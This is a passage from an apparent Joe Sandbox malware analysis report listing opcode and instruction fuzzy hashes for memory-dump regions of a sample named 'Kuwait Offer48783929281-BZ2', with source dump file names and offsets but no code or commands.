                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 528a003248d030426af123a03b37594fc1334c1813ac9f2300debc9fa201a9fa
                                          • Instruction ID: e2a1b79239c460dfbbd0afa0b202bed051dc027d2126b8cdf76998235a379299
                                          • Opcode Fuzzy Hash: 528a003248d030426af123a03b37594fc1334c1813ac9f2300debc9fa201a9fa
                                          • Instruction Fuzzy Hash: 3BF05E353102009FC304DB29D854E2A77AAEFC9721B104069FB068B3A0CA31EC02CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78e92d957b0d09fb7980bd793407760c85781fd8d78942501bb2efb1c60a73bc
                                          • Instruction ID: 5100df558d39e5b452c7bd10afbb4301646aa41e635e8ceeae462f8ba757bb3f
                                          • Opcode Fuzzy Hash: 78e92d957b0d09fb7980bd793407760c85781fd8d78942501bb2efb1c60a73bc
                                          • Instruction Fuzzy Hash: 1BF05E70D09208EFCB95DFB8D44069DBBB5AB4A300F0581AAC88497250D2315A46DB85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c40dae977041265da76bc8c30c880c9070efeb0750ae08ed4d04691628538817
                                          • Instruction ID: e87272bada42b1807c263b68faf8539a729955fab67f67381cb1ec407f0383c1
                                          • Opcode Fuzzy Hash: c40dae977041265da76bc8c30c880c9070efeb0750ae08ed4d04691628538817
                                          • Instruction Fuzzy Hash: 40F05435500269DBEF18EB59C8147DE77B6BB84B44F10462DE401B7295CF781D04CBD6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44295c10b1513dcf823f6eaaf1e644d29d088f888b2983b49da44ec56f4a233d
                                          • Instruction ID: a0d5f47c0010a4cdf92b89976fe0a4bd60aa6dcef640b1e06a9a35b22b9b83bd
                                          • Opcode Fuzzy Hash: 44295c10b1513dcf823f6eaaf1e644d29d088f888b2983b49da44ec56f4a233d
                                          • Instruction Fuzzy Hash: 77F05830D5A348AFCB95DBB894046ADBFB5AB86200F1182EFC84893251C2350A46DF82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d16ef8b56e56e96269994448ffb3601b420896d355ca15813ae1226d5bf229e
                                          • Instruction ID: ec659f07f1799dd19d1280e112cf952a34096f46c85a42e3be6e4c13d7ad970d
                                          • Opcode Fuzzy Hash: 6d16ef8b56e56e96269994448ffb3601b420896d355ca15813ae1226d5bf229e
                                          • Instruction Fuzzy Hash: 4BF0A7712043059FCB11DB66E884C8BFBAAAFC1310704D63BE21A87621CE309C4A87A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 673a893615ad18f3b86a9aa497f52ff6aeb8cc0531e3938acf45dbbd4878cb79
                                          • Instruction ID: 9e002f8f95a178b77e5a34c1f593b5ca3bd1fdffaa229de0b4a268f28a84d10a
                                          • Opcode Fuzzy Hash: 673a893615ad18f3b86a9aa497f52ff6aeb8cc0531e3938acf45dbbd4878cb79
                                          • Instruction Fuzzy Hash: C9F0A7309192889FC791EFB8D495A98FFF49F06200F1444DDC888C3242D6715946CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5d0ab5ae1f94f44894162d6cdae3474dc47ffbe378045a01b0aebee87cd0af3
                                          • Instruction ID: 0991a01ac278245b976c3c46659d0eb04bbc893a9ae47cac7cc8c7b19030b98a
                                          • Opcode Fuzzy Hash: d5d0ab5ae1f94f44894162d6cdae3474dc47ffbe378045a01b0aebee87cd0af3
                                          • Instruction Fuzzy Hash: E501A47094122ACBEB249FA5CD44BAABAB6BB44314F0085FAD41BA2255DB752EC0CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b65eab2b523a576fc3ad6e76241618a6b75f4712f35a862ee1680aeb8646f0c0
                                          • Instruction ID: a97cd21496348c0941e1b7e2215256609d8ac1f285e6decc36304b27be99720b
                                          • Opcode Fuzzy Hash: b65eab2b523a576fc3ad6e76241618a6b75f4712f35a862ee1680aeb8646f0c0
                                          • Instruction Fuzzy Hash: D2013C74A0121EDFDBA4DF54C848AEAB3F5EB89308F5085D8D119A3784CB349E858F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58a3d213abb72d3b2a1a76af731206c2321a3ab7cd7c81ac6e87a8f77f3feed0
                                          • Instruction ID: 40512de59ed49859cbc4fae65757a8ab8802bd0341aef9ea52c260e5cf859530
                                          • Opcode Fuzzy Hash: 58a3d213abb72d3b2a1a76af731206c2321a3ab7cd7c81ac6e87a8f77f3feed0
                                          • Instruction Fuzzy Hash: C7F03031E14218ABCB49DFA4D4487EEBFBBDB44721F14C195D10596250DB741A81CBC4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1365f438856cf5eda5ebe68c9aba072ed7427411d53882e8ecc33005a36b3d5f
                                          • Instruction ID: ca9a85a620b55a4a9d0ac1c4fea0eff3f34dc8191a625024f20782007c08c8c9
                                          • Opcode Fuzzy Hash: 1365f438856cf5eda5ebe68c9aba072ed7427411d53882e8ecc33005a36b3d5f
                                          • Instruction Fuzzy Hash: A8E06D35805208EFCB94DFA4E448D9DBBB4EF4A311F11859AE88557220C231AA95EB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4c2f252f0ff20c3e424c41723a683a9f97b254b2258d56b4325046512bc6548
                                          • Instruction ID: fd8c7e092729671c11f12f1908c61981716062c571d95e97ac7e0da86685639a
                                          • Opcode Fuzzy Hash: d4c2f252f0ff20c3e424c41723a683a9f97b254b2258d56b4325046512bc6548
                                          • Instruction Fuzzy Hash: 74E0923080E388AFCB169B7494555697FB8AF43305F2440DEC88057252C6314D45C7E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1d780acf1a0ba2ae1410371816c45f1c6c6fd350b7a5ee3fa2b176edaa1f8ef
                                          • Instruction ID: d688c578bac7fec187e39361085692a23ac80a2e9e5965bdcd0243a2ef875be8
                                          • Opcode Fuzzy Hash: a1d780acf1a0ba2ae1410371816c45f1c6c6fd350b7a5ee3fa2b176edaa1f8ef
                                          • Instruction Fuzzy Hash: 0CE0127120430597C7109A56EC84D4BF79EDEC5365710D539E21A87225DE70ED5986D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca6f9b369c7d637c861a5416b9ad9c140cc92f8484d85b6cac77de5a8a562d71
                                          • Instruction ID: d5cc398a4292779186e7a5a571d2ea2fde33ccfa3c268939da8cd5369dbec6ac
                                          • Opcode Fuzzy Hash: ca6f9b369c7d637c861a5416b9ad9c140cc92f8484d85b6cac77de5a8a562d71
                                          • Instruction Fuzzy Hash: 35F01774A011299FCB64DF24D95079DB7B2FF86304F408098864EB7254CE301D84CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cf9cfa17585c9e7c2e5d59df642643408df5055252ac153ab7b4943a9054397
                                          • Instruction ID: 7bb6ae569a9917cd435ab18dfd7d64654bc2a1787a5508ab7495f29cfd083d28
                                          • Opcode Fuzzy Hash: 3cf9cfa17585c9e7c2e5d59df642643408df5055252ac153ab7b4943a9054397
                                          • Instruction Fuzzy Hash: 18E0ED30904388AFCB02DFB8C81476EBBF6DF46314F00879AD915DB182DA305E008B82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 236098a807ff63a95f332d7c3420acbc0c569114d2fee35a21b6168b75c65ff1
                                          • Instruction ID: 592a22658a73e9f6a9d67c510c744cdd5711c6581ac1860b6776a76232be92ed
                                          • Opcode Fuzzy Hash: 236098a807ff63a95f332d7c3420acbc0c569114d2fee35a21b6168b75c65ff1
                                          • Instruction Fuzzy Hash: 4DF03970D06289CFDB90CF9AC454AA8F7F9BF49304F01A064D40AAB658DB305885CF82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49ac863378e97d8614a47a39994c5caaef6f71e4046be938bc2d2fe5db3f4353
                                          • Instruction ID: 2ca06258c7bf8d40b00cf45f95476cc93db911e9d6a152d08acffaf3ebb0544f
                                          • Opcode Fuzzy Hash: 49ac863378e97d8614a47a39994c5caaef6f71e4046be938bc2d2fe5db3f4353
                                          • Instruction Fuzzy Hash: 12F030746042A9CBEF18EF98C8543ED7766BB44A48F10461DE002B7265CF780D44CB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7ce2cdf8a024eed58441d19821705564d888b138aacf162b80826fcc2bb8b33
                                          • Instruction ID: 44eaaeef975b35804c659e784c51592f59ff0ecd436d363287aa9647039f6f42
                                          • Opcode Fuzzy Hash: c7ce2cdf8a024eed58441d19821705564d888b138aacf162b80826fcc2bb8b33
                                          • Instruction Fuzzy Hash: 7BE0923510E3829FC722CB25D854D8B7FA19FC1300B04CA6EE0854B467DA30A989C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf58b1291e14453841c6777064985f062b26d56f07eeefc7ae4694d7b60c7f73
                                          • Instruction ID: d54d2c037bcb748545865a2803527a40899bce17061976cdff0daa6292f28fef
                                          • Opcode Fuzzy Hash: cf58b1291e14453841c6777064985f062b26d56f07eeefc7ae4694d7b60c7f73
                                          • Instruction Fuzzy Hash: 79F0C974D05208AFCB94DFA8D5446ADBBF8AB89300F24C0AA9858D3341D6759A41DF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ef18d8b76a70680773c80b78af3fab0be2bf77da1f6fea86ae2057075a76cf2
                                          • Instruction ID: 47970a8b2d91ca865b5d8ab63b352e0c2f320813b383af0c24c9d1c2f80ead75
                                          • Opcode Fuzzy Hash: 9ef18d8b76a70680773c80b78af3fab0be2bf77da1f6fea86ae2057075a76cf2
                                          • Instruction Fuzzy Hash: 19F0D475C402AE8FDB28DF10CC48BEEBA7ABB54308F1045E99509B2650DBB14E858F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36dda0386b3a7da319f8d95434b975b7e822f39f12d5c0e721cc6d7b93757444
                                          • Instruction ID: e4077a4966ba47bd7347fba1f2f3b322a51c5d9ac68e6948ab281aabcbf34b54
                                          • Opcode Fuzzy Hash: 36dda0386b3a7da319f8d95434b975b7e822f39f12d5c0e721cc6d7b93757444
                                          • Instruction Fuzzy Hash: 94E08630B203249BDAD0AA649D00BA273C59B86751F10446DE6065B384DE71E80187D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c553bae51809cdb1bd7409ce5789bca409679390029763206f8dcfc2dceab7c
                                          • Instruction ID: 16b010b2e12884485b1e59ad881fb1e34c58a400ee73911f7a911973200f3128
                                          • Opcode Fuzzy Hash: 0c553bae51809cdb1bd7409ce5789bca409679390029763206f8dcfc2dceab7c
                                          • Instruction Fuzzy Hash: 53E02630B0C7528FDB238B29D8506877BE2AFC970430089AFE049C7205ED24DC158793
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction ID: e033141c97199a860605321f69e16afda6c8a6db659bc6109499a4baec4efd44
                                          • Opcode Fuzzy Hash: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction Fuzzy Hash: E5E0E574E0620CEFDB94DFA8D545AACFBF4EB89300F14C1AA9818A3350D631AA51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction ID: 6f58014ee106a44ae96e762a827af87e4769f552593f086ad71d9e7c311a65a0
                                          • Opcode Fuzzy Hash: 8d7bf14f848082c6f25f42a7d0cc0c31b1553b572de79d8ffd8f16ec91544c2b
                                          • Instruction Fuzzy Hash: 41E0C274E05208EFCB94DFA8D544AACBBF4EF8A300F10C0AA9919A3350D671AA51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction ID: c3ef0c0252222065208514ed8c2c4d8233298af009f73a993092e35b407b8483
                                          • Opcode Fuzzy Hash: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction Fuzzy Hash: 9CE0E574E05308EFCB94DFA8D544AACBBF8EB89304F14D0AD9C08A3341D631AA02CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb125b259659a2f617a3ab1360b4a765cda52e4992ffb0ad8dd81233c051ddeb
                                          • Instruction ID: 28f3e5d91933f808450eb182d2698d813e65c06261dbd84c583fb6ad7a51ec3c
                                          • Opcode Fuzzy Hash: cb125b259659a2f617a3ab1360b4a765cda52e4992ffb0ad8dd81233c051ddeb
                                          • Instruction Fuzzy Hash: 8CE0C278905208EFCB54DFA8D5489ACBBB8EF49301F10C1A9EC0597320C631AA54EB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c1399be2d1cc0ab2f023c60e7e5e7d4838b73b5eeae7bdbb4bffff0a0661530
                                          • Instruction ID: 40ebcacd4ec47215ee9cb27304b4f7a73b8462f34d05b2a9ef5a863d117d467b
                                          • Opcode Fuzzy Hash: 4c1399be2d1cc0ab2f023c60e7e5e7d4838b73b5eeae7bdbb4bffff0a0661530
                                          • Instruction Fuzzy Hash: 3FE01A70D0A20CEFCB54DFA8D404AADBBF9EB49305F14C1AAD804A3310D7359A50EF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction ID: 43396f3f433c6402121d23f11043401236175c7f845e026d1428674695a676a0
                                          • Opcode Fuzzy Hash: bbd9fb3311c2410550a0d07ba99698d4a5613e2fd180787954d0a2019538f757
                                          • Instruction Fuzzy Hash: 71E0E574E05208EFCB94DFA8D544AACBBF8EF8A300F10C0A9881893350D631AA02CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18907062c3ea51e571277aff0f97360c14ac943746b8ac51cd5fd1fc268a3a86
                                          • Instruction ID: 4931b108e72584ff25cfa7bce989c0ac127efbb9ce7dd663ece84b8af153f434
                                          • Opcode Fuzzy Hash: 18907062c3ea51e571277aff0f97360c14ac943746b8ac51cd5fd1fc268a3a86
                                          • Instruction Fuzzy Hash: 85E01A70D0620CEFCB54DFA8D0046ACB7B9EB46300F1081AAC80893300D6355A40EF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e64d3df31226f81c83c341ca94085fe983a5cabe7da1e2736b09a6ac963acf3
                                          • Instruction ID: 98730b15776b315d39bbe0cb2f4c060121f10becc101edd09b3ca7432c67d0e0
                                          • Opcode Fuzzy Hash: 6e64d3df31226f81c83c341ca94085fe983a5cabe7da1e2736b09a6ac963acf3
                                          • Instruction Fuzzy Hash: BFE0867490920CEFC744DFA4D544AFDBBB8AB46311F14D19DD84557341C6319A41DB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a728be099373e45a8180aa32c87f5d0b252e4dca1046045f8ac862430476b2c8
                                          • Instruction ID: 2bb704a9cb9b341e7bd25fa9fe607aa63645ba70fc13a4d40a41f8a2db83aa82
                                          • Opcode Fuzzy Hash: a728be099373e45a8180aa32c87f5d0b252e4dca1046045f8ac862430476b2c8
                                          • Instruction Fuzzy Hash: 96E04F30915208DFC784EFA8C58566CFBF8EB49200F1080A98C09D3340D6719A41CB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10619ca33fa465a651c608c8a508f1eea8b89a49171b2cf1ccfbed674b804c22
                                          • Instruction ID: c2658e5db8bb9c52960fb128b1e59bfe98f4d97c297df0b0ffdde4fa5bf2013d
                                          • Opcode Fuzzy Hash: 10619ca33fa465a651c608c8a508f1eea8b89a49171b2cf1ccfbed674b804c22
                                          • Instruction Fuzzy Hash: B1F0F878902118CFE750DF14D844F89B7B2FB45308F1086AAD90EA7784DA384D898F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73c47c759769e69b9910fc881e0c340f57f9b516f969becdab88659a8abd64df
                                          • Instruction ID: 7cd6c49011a528fc52ecc2c701e42569be704e7b9affa2fc37c89edd6db0cd45
                                          • Opcode Fuzzy Hash: 73c47c759769e69b9910fc881e0c340f57f9b516f969becdab88659a8abd64df
                                          • Instruction Fuzzy Hash: DFE01A34D0920CAFCB58DBA4D5406ACBBB8AB8A300F14C1EDA85853341D6315A01DB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b3408ae1df85c6ddf833f41cc5db39f9526767cbee44925fdf3ddd48b8be657
                                          • Instruction ID: 33961f203c905ae96376fda7bef90214a912d4adb6601517f9a9e07c0c9bcdc5
                                          • Opcode Fuzzy Hash: 2b3408ae1df85c6ddf833f41cc5db39f9526767cbee44925fdf3ddd48b8be657
                                          • Instruction Fuzzy Hash: 89E0C270C2624CDFCB80DFB8D4086ACBBF8EB0A301F1041AA8D08E3300EB301A40DB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d83663ed98de2585f1aeac9fb2d63fad48aec30f2916819e97291d89788c3d3
                                          • Instruction ID: 0f000e5e216c663845335dcc2f86beb39c18c7515afdd325d7843b520de2fa4a
                                          • Opcode Fuzzy Hash: 0d83663ed98de2585f1aeac9fb2d63fad48aec30f2916819e97291d89788c3d3
                                          • Instruction Fuzzy Hash: 52F09B7480062ECFCF759F10CC44AE9BBB6AB88305F0040E69409B2A60DB711EC6EF00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd2538c9c27980752e3a7e9bf7e5fdd766a7f68d211079ea958e035478e17e93
                                          • Instruction ID: 0880b0ec739b94b907bddc1f71b9be90143c2ccb9882d4f7ac261fd544dba99d
                                          • Opcode Fuzzy Hash: cd2538c9c27980752e3a7e9bf7e5fdd766a7f68d211079ea958e035478e17e93
                                          • Instruction Fuzzy Hash: 29F0AE748002AECFDB24DF10CC04BEEBBBABB48304F1085EA9509B2690DBB10E81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bbb3af10d4f5b35dfc4f61ba7d470e75d49c2bce3bc5e0c462e421b6e864d96
                                          • Instruction ID: ad3b76fc0e5a07ba5728a1962444f997db783e05891e473fcd06c2b3ed574b4b
                                          • Opcode Fuzzy Hash: 9bbb3af10d4f5b35dfc4f61ba7d470e75d49c2bce3bc5e0c462e421b6e864d96
                                          • Instruction Fuzzy Hash: CDE08C3894A208DFDB05DFA8E5416ACBBB8AB86301F20D09CC80813340CA316E02CB84
                                          Memory Dump Source
